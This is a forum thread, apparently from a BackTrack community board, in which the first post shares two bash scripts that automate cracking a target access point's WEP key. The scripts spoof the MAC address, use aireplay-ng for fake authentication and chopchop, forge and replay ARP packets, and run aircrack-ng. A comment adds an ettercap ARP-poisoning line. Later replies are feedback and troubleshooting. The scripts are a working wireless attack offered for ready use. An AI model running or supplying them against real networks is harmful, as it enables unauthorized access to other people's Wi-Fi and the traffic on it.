Page 1 of 2 12 LastLast
Results 1 to 10 of 33

Thread: WEP crack Script AUTOHACK.sh

Hybrid View

  1. #1
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default WEP crack Script AUTOHACK.sh

    So wesside-ng appears to be a bit buggy so you guys can use this lame bash script I made ...

    1:34 PM 8/18/2009 http://forums.remote-exploit.org/wir...-released.html
    I did not know how much a deauth increases the speed I will add that to my script if wepbuster does not fancy me but tested OK works great " http://forums.remote-exploit.org/bac...tml#post148380 "

    3:48 PM 5/29/2009: I prefer wepbuster no but .. SpoonWEP 2 FTW ! http://forums.remote-exploit.org/showthread.php?t=21902

    12:03 PM 5/19/2009: updated to put iface down before machchanger ...

    12:10 PM 5/19/2009: other scripts that prob better then mine ..
    http://forums.remote-exploit.org/showthread.php?t=3590
    http://forums.remote-exploit.org/showthread.php?t=5980





    ---------

    BT4
    Code:
    #!/bin/bash
    
    # MY INFO
    variface=wlan0
    varchannel="6"
    varmymac="00:C0:CA:1A:8C:0B"
    
    
    # TARGET INFO
    varapmac="00:0F:66:47:54:0F"
    varchannel="6"
    
    
    ## DONT EDIT BELOW THIS LINE LESS YOU KNOW WHAT YOU ARE DOING 
    
    ifconfig $variface down
    sleep 5
    macchanger -m 00:C0:CA:1A:8C:0B  $variface
    sleep 5
    ifconfig $variface up
    
    
    
    
    
    
    echo NOTES:
    echo good power is 50+
    
    
    
    rm  -Rf out* repla*  *.cap *.xor arp
    
    airmon-ng start $variface $varchannel
    
    aireplay-ng -1 0 -a $varapmac -h $varmymac $variface
    
    #screen wait for Y
    aireplay-ng -4  -h $varmymac  -b $varapmac $variface
    
    mv  *.xor 1.xor
    packetforge-ng -0 -a $varapmac -h $varmymac -k 255.255.255.255 -l 255.255.255.255 -w arp -y 1.xor
    
    #screen
    
    echo !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    echo ! PRESS Y ENTER WHEN THE PROMPT POPS UP   !
    echo !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    sleep 5
    
    xterm -e "airodump-ng -c $varchannel --bssid $varapmac -w arps $variface"  &
    
    
    
    
    xterm -e "aireplay-ng -2 -r arp $variface" &
    
    
    
    echo RUN !!!!!! 
    echo aircrack-ng -P 2 -b $varapmac   '*.cap'
    #aircrack-ng -P 2 -b $varapmac  arp*.cap
    
    # notes : 
    # ettercap -i wlan0 -T -q -M ARP // //
    # wesside-ng -i wlan0 -v AP

    OLD for BT3
    Code:
    #!/bin/bash
    varmymac="00:C0:CA:1A:8C:0B"
    
    # TARGET INFO
    varapmac="00:1A:70:55:DF:FF"
    varchannel="6"
    
    
    echo NOTES:
    echo good power is 40+
    
    
    
    rm  -Rf out* repla*  *.cap *.xor
    
    airmon-ng start wlan0 $varchannel
    
    aireplay-ng -1 0 -a $varapmac -h $varmymac wlan0
    
    #screen wait for Y
    aireplay-ng -4  -h $varmymac  -b $varapmac wlan0
    
    # This is broken in BT4 mv `ls -la  *.xor | awk '{print $9}' | sed 's/*//g'` 1.xor
    mv *.xor 1.xor
    
    packetforge-ng -0 -a $varapmac -h $varmymac -k 255.255.255.255 -l 255.255.255.255 -w arp -y 1.xor
    
    #screen
    
    echo !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    echo ! PRESS Y ENTER WHEN THE PROMPT POPS UP   !
    echo !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    sleep 5
    
    xterm -e "airodump-ng -c $varchannel --bssid $varapmac -w arps wlan0"  &
    
    
    
    
    xterm -e "aireplay-ng -2 -r arp wlan0" &
    
    
    
    echo RUN !!!!!! 
    echo aircrack-ng -P 2 -b $varapmac  arp*.cap
    #aircrack-ng -P 2 -b $varapmac  arp*.cap
    
    
    # ettercap -i wlan0 -T -q -M ARP // //
    
    
    # wesside-ng -i wlan0 -v AP
    # http://rmccurdy.com ;0

  2. #2
    Junior Member
    Join Date
    Aug 2007
    Posts
    85

    Default

    looks nice
    ill try it out


    Thanks Operat0r
    How you spend your time is more important than how you spend your money. Money mistakes can be corrected, but time is gone forever. David Norris

  3. #3
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    5

    Default It needs to be tweaked a bit for this to work with iwl3945...

    I had problems with it when I ran it on my Dell 820 which has an Intel Wireless NIC (iwl3945) I didn't have much time to tweak it, but I expect to be able to get it working.

  4. #4

    Default

    Suggestion - get it to print all the MAC addresses of the Access points, then put them into the script itself, rather than have the user specify it beforehand. It would just make the whole process more automated (the point of a script).

    -Stephen

  5. #5
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    I may update it but then again from what I hear BT3 may have ididot proof WEP and by that time maybe wesside-ng will work better

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Why is this called WPA autohack? Do I need to change or do I need to learn to read bash better because it apears to me to be a WEP script.

  7. #7

    Default

    Heh, purh@te, you're right. I read only the first few lines and thought "this isn't automated enough", and didn't read any further, but yes - this is WEP. WPA would actually be easier to automate - kick off or just wait for a handshake. My oversight

    -Stephen

  8. #8
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default spoonwep

    no spoon wep ?

    wessideng still does not work all the time

    updated the script to work with BT4 ... still horrid but it works ..

  9. #9
    Just burned his ISO
    Join Date
    Apr 2009
    Posts
    7

    Default

    im a big time newbie trying to learn this on the fly. so i would create this script in a folder and run it from the shell on Bt4 .... of course i would have to get my broadcom 4328 working first for it doesnt want to show up in the ifconfig

  10. #10
    Just burned his ISO
    Join Date
    May 2009
    Posts
    23

    Default

    i had replaced wlan0 -> wifi0 then i got error

    ERROR: Can't change MAC: interface up or not permission: Device or resource busy
    I couldn't change mac address, can you help me change it

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •